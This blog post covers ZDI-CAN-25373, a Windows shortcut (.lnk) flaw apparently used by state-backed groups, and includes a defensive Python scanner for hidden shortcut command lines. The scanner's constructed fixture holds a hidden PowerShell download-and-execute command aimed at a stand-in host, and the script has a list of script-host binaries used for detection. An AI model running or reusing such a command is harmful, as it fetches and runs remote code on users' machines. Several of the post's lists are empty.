LEMON BLOG

Zero-Day Windows Shortcut Exploit Used by State-Backed Hackers Since 2017

A newly disclosed zero-day vulnerability in Windows shortcut files (.lnk) has been exploited in the wild for several years by state-sponsored hacking groups. Tracked as ZDI-CAN-25373, the flaw lets attackers execute malicious commands silently through a shortcut file, which makes the activity hard to detect with traditional security tools.

Security researchers revealed that this vulnerability has been abused since at least 2017 by advanced persistent threat (APT) groups linked to 11 different countries.

Threat Details

The exploit relies on manipulated .lnk files, the shortcut format used throughout Windows. Over 1,000 weaponized shortcut files have been uncovered globally. The attackers use the technique primarily for cyber espionage and data theft.

Among the nations identified as origin points are:

Targeted Sectors (Top Attack Areas)

Sector                                                   Share of attacks
Government                                               22.8%
Private sector                                           14%
Financial, Think Tanks, Telco, Military, Energy (each)   8.77%
Cryptocurrency                                           5.26%
Education, Healthcare, Media (each)                      3.51%
Critical Infrastructure, Nuclear (each)                  1.75%

These figures show broad and strategic targeting, with a focus on sectors tied to national security, economic stability, and intellectual property.

Malware Families and Tools Used

Attackers leveraging ZDI-CAN-25373 deployed a wide range of malware, including:

These payloads enable persistent access, data theft, and in some cases, ransomware deployment.

How the Exploit Works

The attack method is stealthy and sophisticated:

Although a proof-of-concept (PoC) was submitted, Microsoft declined to patch the vulnerability, stating that it does not meet its criteria for remediation. This leaves defenders to rely on alternative protection methods.
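Because there is no patch, the practical defence is to find weaponized shortcuts before a user double-clicks them. The post does not reproduce the mechanism itself, but the public ZDI/Trend Micro research on ZDI-CAN-25373 describes the shortcut's command-line arguments being padded with whitespace so that the visible Target field looks empty while the real command still runs. The following script is an added example (not code from the post or from the researchers): it parses the Shell Link binary format (MS-SHLLNK) far enough to recover the StringData fields, then applies simple hunting heuristics (script-host target, long whitespace run, oversized arguments, minimised window). The heuristics, the fixture builder `build_lnk`, and the two sample shortcuts are constructed for this example; only RelativePath is inspected as the target, so a production scanner should also resolve the LinkTargetIDList/LinkInfo target.

```python
"""Triage Windows .lnk files for hidden command lines (added example, not from the post)."""
import re
import struct
from pathlib import Path

# ShellLinkHeader constants, per the MS-SHLLNK specification.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 1 << 0, 1 << 1
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 1 << 2, 1 << 3, 1 << 4
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 1 << 5, 1 << 6, 1 << 7
SW_SHOWMINNOACTIVE = 7  # ShowCommand value that opens the target minimised

# StringData sections appear in this fixed order when their flag is set.
STRING_DATA = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location"))

# Hunting heuristics: assumptions of this example, tune them for your estate.
SCRIPT_HOSTS = ("cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe")
WHITESPACE_RUN = re.compile(r"[ \t\r\n\x0b\x0c]{8,}")
MAX_SANE_ARGS = 260


def parse_lnk(data: bytes) -> dict:
    """Return the header flags, ShowCommand and StringData strings of a .lnk blob."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("bad HeaderSize: not a shell link")
    if data[4:20] != LNK_CLSID:
        raise ValueError("bad LinkCLSID: not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    show_command = struct.unpack_from("<I", data, 60)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfoSize (4 bytes) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {"flags": flags, "show_command": show_command}
    for flag, name in STRING_DATA:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        if flags & IS_UNICODE:
            info[name] = data[off:off + 2 * count].decode("utf-16-le")
            off += 2 * count
        else:
            info[name] = data[off:off + count].decode("cp1252", errors="replace")
            off += count
    return info


def assess_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing suspicious."""
    info = parse_lnk(data)
    args = info.get("arguments", "")
    # Only RelativePath is inspected here; a production scanner should also resolve
    # the LinkTargetIDList / LinkInfo target, which this example skips.
    target = info.get("relative_path", "").lower()
    findings = []
    if args and any(target.endswith(host) for host in SCRIPT_HOSTS):
        findings.append(f"target is a script/command host: {target}")
    if WHITESPACE_RUN.search(args):
        findings.append("arguments contain a long whitespace run (pushes the real "
                        "command out of view in the shortcut Properties dialog)")
    if len(args) > MAX_SANE_ARGS:
        findings.append(f"arguments unusually long ({len(args)} characters)")
    if info["show_command"] == SW_SHOWMINNOACTIVE and args:
        findings.append("ShowCommand=SW_SHOWMINNOACTIVE hides the launched window")
    return findings


def scan_tree(root: str) -> dict:
    """Map every .lnk under root to its findings (files that fail to parse are skipped)."""
    results = {}
    for path in Path(root).rglob("*.lnk"):
        try:
            findings = assess_lnk(path.read_bytes())
        except ValueError:
            continue
        if findings:
            results[str(path)] = findings
    return results


def build_lnk(relative_path: str, arguments: str, show_command: int = 1) -> bytes:
    """Build a minimal Unicode .lnk: a constructed fixture for this example, not a real sample."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIIIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)

    def string_data(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path) + string_data(".") + string_data(arguments)
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes ExtraData


# Constructed samples: one ordinary shortcut, one whose arguments are padded so the
# visible part of the Target field looks empty (payload host is a reserved .invalid name).
BENIGN = build_lnk("..\\Program Files\\Notepad++\\notepad++.exe", "-multiInst")
HIDDEN = build_lnk("..\\Windows\\System32\\cmd.exe",
                   " " * 300 + "/c powershell -nop -w hidden -c \"iwr http://example.invalid/s.ps1|iex\"",
                   show_command=SW_SHOWMINNOACTIVE)

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("hidden", HIDDEN)):
        print(label, assess_lnk(blob) or "clean")
```

Run `scan_tree(r"C:\Users")` (or over a mounted image) to triage a whole profile tree; a shortcut that trips the whitespace or length heuristic is worth pulling for analysis even if its target is not in the script-host list, since attackers can also point the shortcut at a renamed or less common binary.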

Recommended Mitigations and Workarounds

Since no official patch exists, organizations must act proactively. Recommended best practices include:

Conclusion

The exploitation of ZDI-CAN-25373 by state-backed actors underscores the growing sophistication of modern cyber threats. Without a patch from Microsoft, it's essential for organizations to take defensive measures, improve visibility, and adopt a proactive threat-hunting approach.

This vulnerability is a stark reminder that file types which are not themselves executables, such as .lnk shortcuts, can still trigger code execution and pose serious threats, especially when leveraged by nation-state actors for espionage and data exfiltration.
